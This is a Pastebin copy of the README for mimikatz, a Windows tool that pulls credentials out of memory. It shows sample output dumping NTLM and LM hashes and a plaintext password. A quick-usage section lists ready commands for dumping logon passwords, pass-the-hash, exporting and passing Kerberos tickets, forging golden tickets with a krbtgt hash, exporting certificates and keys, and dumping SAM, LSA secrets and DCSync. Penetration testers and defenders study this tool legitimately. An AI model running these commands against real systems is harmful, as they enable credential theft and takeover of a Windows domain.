API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Feb 7th, 2018
280
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.83 KB | None | 0 0
raw download clone embed print report
  1. # mimikatz
  2.  
  3. **`mimikatz`** is a tool I've made to learn `C` and make somes experiments with Windows security.
  4.  
  5. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. **`mimikatz`** can also perform pass-the-hash, pass-the-ticket or build _Golden tickets_.
  6.  
  7. ```
  8. .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
  9. .## ^ ##.
  10. ## / \ ## /* * *
  11. ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
  12. '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
  13. '#####' with 13 modules * * */
  14.  
  15.  
  16. mimikatz # privilege::debug
  17. Privilege '20' OK
  18.  
  19. mimikatz # sekurlsa::logonpasswords
  20.  
  21. Authentication Id : 0 ; 515764 (00000000:0007deb4)
  22. Session : Interactive from 2
  23. User Name : Gentil Kiwi
  24. Domain : vm-w7-ult-x
  25. SID : S-1-5-21-1982681256-1210654043-1600862990-1000
  26. msv :
  27. [00000003] Primary
  28. * Username : Gentil Kiwi
  29. * Domain : vm-w7-ult-x
  30. * LM : d0e9aee149655a6075e4540af1f22d3b
  31. * NTLM : cc36cf7a8514893efccd332446158b1a
  32. * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
  33. tspkg :
  34. * Username : Gentil Kiwi
  35. * Domain : vm-w7-ult-x
  36. * Password : waza1234/
  37. ...
  38. ```
  39. But that's not all! `Crypto`, `Terminal Server`, `Events`, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, _yes_).
  40.  
  41. If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases
  42.  
  43.  
  44. ## Quick usage
  45. ```
  46. log
  47. privilege::debug
  48. ```
  49.  
  50. ### sekurlsa
  51. ```
  52. sekurlsa::logonpasswords
  53. sekurlsa::tickets /export
  54.  
  55. sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
  56. ```
  57.  
  58. ### kerberos
  59. ```
  60. kerberos::list /export
  61. kerberos::ptt c:\chocolate.kirbi
  62.  
  63. kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
  64. ```
  65.  
  66. ### crypto
  67. ```
  68. crypto::capi
  69. crypto::cng
  70.  
  71. crypto::certificates /export
  72. crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
  73.  
  74. crypto::keys /export
  75. crypto::keys /machine /export
  76. ```
  77.  
  78. ### vault & lsadump
  79. ```
  80. vault::cred
  81. vault::list
  82.  
  83. token::elevate
  84. vault::cred
  85. vault::list
  86. lsadump::sam
  87. lsadump::secrets
  88. lsadump::cache
  89. token::revert
  90.  
  91. lsadump::dcsync /user:domain\krbtgt /domain:lab.local
  92. ```
  93.  
  94. ## Build
  95. `mimikatz` is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:
  96. * for `mimikatz` and `mimilib` : Visual Studio 2010, 2012 or 2013 for Desktop (**2013 Express for Desktop is free and supports x86 & x64** - http://www.microsoft.com/download/details.aspx?id=44914)
  97. * _for `mimikatz driver`, `mimilove` (and `ddk2003` platform) : Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800_
  98.  
  99. `mimikatz` uses `SVN` for source control, but is now available with `GIT` too!
  100. You can use any tools you want to sync, even incorporated `GIT` in Visual Studio 2013 =)
  101.  
  102. ### Synchronize!
  103. * GIT URL is : https://github.com/gentilkiwi/mimikatz.git
  104. * SVN URL is : https://github.com/gentilkiwi/mimikatz/trunk
  105. * ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip
  106.  
  107. ### Build the solution
  108. * After opening the solution, `Build` / `Build Solution` (you can change architecture)
  109. * `mimikatz` is now built and ready to be used! (`Win32` / `x64`)
  110. * you can have error `MSB3073` about `_build_.cmd` and `mimidrv`, it's because the driver cannot be build without Windows Driver Kit **7.1** (WinDDK), but `mimikatz` and `mimilib` are OK.
  111.  
  112. ### ddk2003
  113. With this optional MSBuild platform, you can use the WinDDK build tools, and the default `msvcrt` runtime (smaller binaries, no dependencies)
  114.  
  115. For this optional platform, Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio **2010** are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.
  116.  
  117. Follow instructions:
  118. * http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
  119. * _http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader_
  120.  
  121. ## Licence
  122. CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/
  123.  
  124. ## Author
  125. * Benjamin DELPY `gentilkiwi`, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )
  126. * DCSync function in `lsadump` module was co-writed with Vincent LE TOUX, you contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )
  127.  
  128. This is a **personal** development, please respect its philosophy and don't use it for bad things!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!